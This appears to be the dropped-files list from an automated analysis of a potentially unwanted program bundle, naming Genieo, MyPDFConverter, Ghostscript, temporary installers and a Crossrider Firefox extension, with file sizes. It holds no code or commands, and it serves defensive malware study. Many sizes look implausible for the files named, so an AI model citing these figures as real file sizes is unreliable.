C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\noPicture_.png (976 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\play_big.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\tools.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\trash.png (515 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\genieo_logo.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\template_factory.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_v.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\icons\thumb_down.png (703 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\miniview.css (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\mobile.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\Renderers.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\defaultPicture.png (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template2sm.png (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\bigHotItemIcon.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template1sm.jpg (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template3.jpg (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\magazinePreview\coverShadow.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\bigHotItemIcon.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\prog_bar.gif (101 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twit_pic.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\x_gray.png (193 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\pink.gif (801 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\topicDefault.gif (565 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\birthday.html (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_x.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\footer_left.png (256 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\tpl\main.tpl (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\prototype.postmessage.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack2sm.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-few-clouds.png (763 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\pagelet_tip_white_down.png (191 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\personalizationMeter\lowLevel.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\settings\okCancelButton.png (734 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\dfImg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\dot_clear.gif (42 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\genieo_is_installed.js (37 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\bday_image.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\ie9.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\.settings\org.eclipse.core.resources.prefs (124 bytes)
C:\ProgramData\IHProtectUpDate\update\conf (5 bytes)
%Program Files% (x86)\GPLGS\traceop.ps (2 bytes)
%Program Files% (x86)\GPLGS\fonts.dir (27 bytes)
%Program Files% (x86)\GPLGS\zeroline.ps (2 bytes)
%Program Files% (x86)\GPLGS\viewcmyk.ps (2 bytes)
%Program Files% (x86)\GPLGS\quit.ps (6 bytes)
%Program Files% (x86)\GPLGS\pv.sh (1 bytes)
%Program Files% (x86)\GPLGS\Fontmap.Ult (6 bytes)
%Program Files% (x86)\GPLGS\markhint.ps (3 bytes)
%Program Files% (x86)\GPLGS\gs_fonts.ps (45 bytes)
%Program Files% (x86)\GPLGS\z003034l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_il1_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\n021004l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_diskf.ps (7 bytes)
%Program Files% (x86)\GPLGS\gs_wl2_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_wan_e.ps (1 bytes)
%Program Files% (x86)\GPLGS\fonts.scale (27 bytes)
%Program Files% (x86)\GPLGS\viewps2a.ps (1 bytes)
%Program Files% (x86)\GPLGS\Fontmap.VMS (14 bytes)
%Program Files% (x86)\GPLGS\gsnup.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_stres.ps (4 bytes)
%Program Files% (x86)\GPLGS\p052024l.pfb (673 bytes)
%Program Files% (x86)\GPLGS\gs_t.xbm (353 bytes)
%Program Files% (x86)\GPLGS\gs_pdf_e.ps (1 bytes)
%Program Files% (x86)\GPLGS\acctest.ps (4 bytes)
%Program Files% (x86)\GPLGS\b018032l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_mgl_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\pdf_draw.ps (41 bytes)
%Program Files% (x86)\GPLGS\pdf_font.ps (43 bytes)
%Program Files% (x86)\GPLGS\viewpcx.ps (4 bytes)
%Program Files% (x86)\GPLGS\n022003l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_sepr.ps (8 bytes)
%Program Files% (x86)\GPLGS\gs_typ32.ps (4 bytes)
%Program Files% (x86)\GPLGS\gs_lev2.ps (31 bytes)
%Program Files% (x86)\GPLGS\c059013l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\b018012l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gswin32c.exe (601 bytes)
%Program Files% (x86)\GPLGS\gs_type1.ps (7 bytes)
%Program Files% (x86)\GPLGS\type1enc.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_ce_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_lgo_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\addxchar.ps (10 bytes)
%Program Files% (x86)\GPLGS\gs_frsd.ps (3 bytes)
%Program Files% (x86)\GPLGS\rollconv.ps (12 bytes)
%Program Files% (x86)\GPLGS\gs_cff.ps (22 bytes)
%Program Files% (x86)\GPLGS\Info-macos.plist (483 bytes)
%Program Files% (x86)\GPLGS\gs_wl1_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_css_e.ps (5 bytes)
%Program Files% (x86)\GPLGS\gs_ksb_e.ps (3 bytes)
%Program Files% (x86)\GPLGS\gs_l.xbm (1 bytes)
%Program Files% (x86)\GPLGS\ht_ccsto.ps (1281 bytes)
%Program Files% (x86)\GPLGS\gs_il2_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_t_m.xbm (363 bytes)
%Program Files% (x86)\GPLGS\Fontmap.Sol (16 bytes)
%Program Files% (x86)\GPLGS\uninfo.ps (6 bytes)
%Program Files% (x86)\GPLGS\pdf_rbld.ps (13 bytes)
%Program Files% (x86)\GPLGS\Fontmap.OSF (6 bytes)
%Program Files% (x86)\GPLGS\gs_devcs.ps (6 bytes)
%Program Files% (x86)\GPLGS\decrypt.ps (369 bytes)
%Program Files% (x86)\GPLGS\gs_dps2.ps (7 bytes)
%Program Files% (x86)\GPLGS\p052023l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_ttf.ps (43 bytes)
%Program Files% (x86)\GPLGS\pdf_ops.ps (21 bytes)
%Program Files% (x86)\GPLGS\viewjpeg.ps (5 bytes)
%Program Files% (x86)\GPLGS\pdfopt.ps (37 bytes)
%Program Files% (x86)\GPLGS\pdf_sec.ps (10 bytes)
%Program Files% (x86)\GPLGS\type1ops.ps (7 bytes)
%Program Files% (x86)\GPLGS\printafm.ps (3 bytes)
%Program Files% (x86)\GPLGS\gs_btokn.ps (11 bytes)
%Program Files% (x86)\GPLGS\a010035l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\n022004l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_dscp.ps (4 bytes)
%Program Files% (x86)\GPLGS\Fontmap.GS (13 bytes)
%Program Files% (x86)\GPLGS\gsdll32.dll (19686 bytes)
%Program Files% (x86)\GPLGS\gs_l.xpm (2 bytes)
%Program Files% (x86)\GPLGS\gs_cspace.ps (30 bytes)
%Program Files% (x86)\GPLGS\showpage.ps (10 bytes)
%Program Files% (x86)\GPLGS\gs_std_e.ps (3 bytes)
%Program Files% (x86)\GPLGS\wftopfa.ps (9 bytes)
%Program Files% (x86)\GPLGS\stcolor.ps (5 bytes)
%Program Files% (x86)\GPLGS\pf2afm.ps (15 bytes)
%Program Files% (x86)\GPLGS\gs_statd.ps (13 bytes)
%Program Files% (x86)\GPLGS\gs_typ42.ps (1 bytes)
%Program Files% (x86)\GPLGS\docie.ps (7 bytes)
%Program Files% (x86)\GPLGS\gs_cmdl.ps (5 bytes)
%Program Files% (x86)\GPLGS\prfont.ps (6 bytes)
%Program Files% (x86)\GPLGS\gs_sym_e.ps (3 bytes)
%Program Files% (x86)\GPLGS\gs_s_m.xbm (615 bytes)
%Program Files% (x86)\GPLGS\caption.ps (1 bytes)
%Program Files% (x86)\GPLGS\gs_cidfm.ps (4 bytes)
%Program Files% (x86)\GPLGS\pphs (220 bytes)
%Program Files% (x86)\GPLGS\gs_icc.ps (10 bytes)
%Program Files% (x86)\GPLGS\gs_epsf.ps (7 bytes)
%Program Files% (x86)\GPLGS\gs_ciecs2.ps (3 bytes)
%Program Files% (x86)\GPLGS\gs_devn.ps (5 bytes)
%Program Files% (x86)\GPLGS\gs_dps.ps (8 bytes)
%Program Files% (x86)\GPLGS\n019024l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\level1.ps (117 bytes)
%Program Files% (x86)\GPLGS\gs_resst.ps (5 bytes)
%Program Files% (x86)\GPLGS\Fontmap.OS2 (7 bytes)
%Program Files% (x86)\GPLGS\c059033l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_rdlin.ps (886 bytes)
%Program Files% (x86)\GPLGS\gs_dpnxt.ps (4 bytes)
%Program Files% (x86)\GPLGS\cid2code.ps (4 bytes)
%Program Files% (x86)\GPLGS\n021023l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_ciddc.ps (7 bytes)
%Program Files% (x86)\GPLGS\gs_init.ps (601 bytes)
%Program Files% (x86)\GPLGS\gs_cidtt.ps (4 bytes)
%Program Files% (x86)\GPLGS\gs_img.ps (22 bytes)
%Program Files% (x86)\GPLGS\gs_pfile.ps (4 bytes)
%Program Files% (x86)\GPLGS\c059036l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\c059016l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_m_m.xbm (971 bytes)
%Program Files% (x86)\GPLGS\Fontmap.ATM (5 bytes)
%Program Files% (x86)\GPLGS\markpath.ps (1 bytes)
%Program Files% (x86)\GPLGS\gs_devpxl.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_cidcm.ps (16 bytes)
%Program Files% (x86)\GPLGS\gs_diskn.ps (7 bytes)
%Program Files% (x86)\GPLGS\n019044l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\n022024l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_cmap.ps (17 bytes)
%Program Files% (x86)\GPLGS\Fontmap.ATB (6 bytes)
%Program Files% (x86)\GPLGS\pdf2dsc.ps (5 bytes)
%Program Files% (x86)\GPLGS\pphs.ps (7 bytes)
%Program Files% (x86)\GPLGS\unprot.ps (1 bytes)
%Program Files% (x86)\GPLGS\gs_fform.ps (3 bytes)
%Program Files% (x86)\GPLGS\landscap.ps (1 bytes)
%Program Files% (x86)\GPLGS\wrfont.ps (18 bytes)
%Program Files% (x86)\GPLGS\lines.ps (4 bytes)
%Program Files% (x86)\GPLGS\gs_cidfn.ps (13 bytes)
%Program Files% (x86)\GPLGS\gs_mex_e.ps (4 bytes)
%Program Files% (x86)\GPLGS\gs_lgx_e.ps (1 bytes)
%Program Files% (x86)\GPLGS\traceimg.ps (1 bytes)
%Program Files% (x86)\GPLGS\gs_l2img.ps (5 bytes)
%Program Files% (x86)\GPLGS\gs_ccfnt.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_kanji.ps (4 bytes)
%Program Files% (x86)\GPLGS\a010033l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_l_m.xbm (1 bytes)
%Program Files% (x86)\GPLGS\a010015l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\pfbtopfa.ps (1 bytes)
%Program Files% (x86)\GPLGS\b018015l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\n019064l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\Fontmap.SGI (14 bytes)
%Program Files% (x86)\GPLGS\ppath.ps (2 bytes)
%Program Files% (x86)\GPLGS\viewpbm.ps (5 bytes)
%Program Files% (x86)\GPLGS\gs_res.ps (35 bytes)
%Program Files% (x86)\GPLGS\gs_s.xbm (605 bytes)
%Program Files% (x86)\GPLGS\n019004l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_m.xpm (1 bytes)
%Program Files% (x86)\GPLGS\gs_m.xbm (961 bytes)
%Program Files% (x86)\GPLGS\s050000l.pfb (33 bytes)
%Program Files% (x86)\GPLGS\p052004l.pfb (673 bytes)
%Program Files% (x86)\GPLGS\font2c.ps (20 bytes)
%Program Files% (x86)\GPLGS\stcinfo.ps (26 bytes)
%Program Files% (x86)\GPLGS\gs_t.xpm (633 bytes)
%Program Files% (x86)\GPLGS\gslp.ps (20 bytes)
%Program Files% (x86)\GPLGS\pcharstr.ps (3 bytes)
%Program Files% (x86)\GPLGS\gs_dbt_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_patrn.ps (8 bytes)
%Program Files% (x86)\GPLGS\xlatmap (1 bytes)
%Program Files% (x86)\GPLGS\n019023l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\ps2ai.ps (23 bytes)
%Program Files% (x86)\GPLGS\gs_indxd.ps (5 bytes)
%Program Files% (x86)\GPLGS\gs_trap.ps (3 bytes)
%Program Files% (x86)\GPLGS\errpage.ps (8 bytes)
%Program Files% (x86)\GPLGS\n019003l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\stocht.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_mro_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\bdftops.ps (24 bytes)
%Program Files% (x86)\GPLGS\winmaps.ps (3 bytes)
%Program Files% (x86)\GPLGS\viewgif.ps (4 bytes)
%Program Files% (x86)\GPLGS\pdf_base.ps (25 bytes)
%Program Files% (x86)\GPLGS\gs_s.xpm (993 bytes)
%Program Files% (x86)\GPLGS\pdf_main.ps (35 bytes)
%Program Files% (x86)\GPLGS\gs_dps1.ps (4 bytes)
%Program Files% (x86)\GPLGS\n022023l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\n021003l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\d050000l.pfb (45 bytes)
%Program Files% (x86)\GPLGS\gs_wl5_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_agl.ps (29 bytes)
%Program Files% (x86)\GPLGS\impath.ps (5 bytes)
%Program Files% (x86)\GPLGS\pdfwrite.ps (10 bytes)
%Program Files% (x86)\GPLGS\COPYING (17 bytes)
%Program Files% (x86)\GPLGS\gs_pdfwr.ps (21 bytes)
%Program Files% (x86)\GPLGS\a010013l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\jispaper.ps (961 bytes)
%Program Files% (x86)\GPLGS\showchar.ps (3 bytes)
%Program Files% (x86)\GPLGS\font2pcl.ps (18 bytes)
%Program Files% (x86)\GPLGS\viewmiff.ps (3 bytes)
%Program Files% (x86)\GPLGS\n021024l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_resmp.ps (21 bytes)
%Program Files% (x86)\GPLGS\n019043l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\align.ps (2 bytes)
%Program Files% (x86)\GPLGS\p052003l.pfb (673 bytes)
%Program Files% (x86)\GPLGS\gs_setpd.ps (28 bytes)
%Program Files% (x86)\GPLGS\b018035l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_ll3.ps (10 bytes)
%Program Files% (x86)\GPLGS\image-qa.ps (601 bytes)
%Program Files% (x86)\GPLGS\gs_fapi.ps (9 bytes)
%Program Files% (x86)\GPLGS\n019063l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_fntem.ps (11 bytes)
%Program Files% (x86)\GPLGS\gs_ciecs3.ps (3 bytes)
%Program Files% (x86)\GPLGS\packfile.ps (10 bytes)
%Program Files% (x86)\MyPDFConverter\setup.inf (312 bytes)
C:\Windows\System32\spool\drivers\x64\PSCRIPT5.DLL (4185 bytes)
%Program Files% (x86)\MyPDFConverter\README.HTM (4 bytes)
C:\Windows\System32\spool\drivers\x64\PSCRIPT.HLP (26 bytes)
C:\Windows\System32\spool\drivers\x64\CUSTPDFW.PPD (31 bytes)
%Program Files% (x86)\MyPDFConverter\setup\unInstpw64.exe (24 bytes)
%Program Files% (x86)\MyPDFConverter\PDFWrite.rsp (116 bytes)
C:\Windows\System32\spool\drivers\x64\PS5UI.DLL (5873 bytes)
%Program Files% (x86)\MyPDFConverter\CPWriter2.exe (601 bytes)
%Program Files% (x86)\MyPDFConverter\unInstpw64.exe (23 bytes)
%Program Files% (x86)\MyPDFConverter\Preferences.exe (24 bytes)
%Program Files% (x86)\MyPDFConverter\setup\Converter.exe (678 bytes)
C:\Windows\System32\spool\drivers\x64\PSCRIPT.NTF (7433 bytes)
%Program Files% (x86)\MyPDFConverter\pdfwriter.exe (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2405.tmp\StdUtils.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2405.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2405.tmp\Qzcggrhivnxb.tmp (455919 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2405.tmp\Vlwgfsqfpaz.exe (1749665 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\1058.bat (411 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2405.tmp\FacebookIsGod.dll (2552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe_d (167333 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe_e (167333 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe_b (167333 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe_c (167333 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe_a (167333 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.7 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.6 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\eula[1].htm (1056 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.5 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.2 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.4 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.3 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (1156 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.1 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.2 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\eula[2].htm (1056 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.1 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.0 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\mydpfconv icon[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.4 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.5 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.1 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.0 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.3 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.2 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.5 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.4 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.7 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.6 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\tokyo_sprite_full[1].png (1300 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\5P76D326.txt (97 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\eula-mystartsearch[1].htm (1871 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.3 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.0 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\4b5cb7aab8d80a4ba5daaec3cbcf46f0[1].htm (43893 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.6 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.7 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.1 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.7 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.6 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.5 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.4 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.3 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.2 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\eula-sourceapp[1].htm (4319 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.0 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8CO6P6LD.txt (94 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F365.tmp (79808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\tokyoThreeWavesBG[1].jpg (200 bytes)
C:\Windows\System32\custmon64.dll (601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\221.js (419 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\234.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\288.js (557 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\354.js (5118 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\dbe88a314f000d3b15042465fdf21cc5.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\1.js (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\crossrider_statusbar.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\c422d0a33c0be34d39a93687c738b5f0.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\255.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\icon24.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\button1.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\7df47bd2f0a36fc56fb4d5f85d879331.js (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\2edcf1d6343b69377b1b5ab704fc0dba.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\ab9e8724735655aca91d2a7b089e2a0b.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\install.rdf (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\263.js (5 bytes)
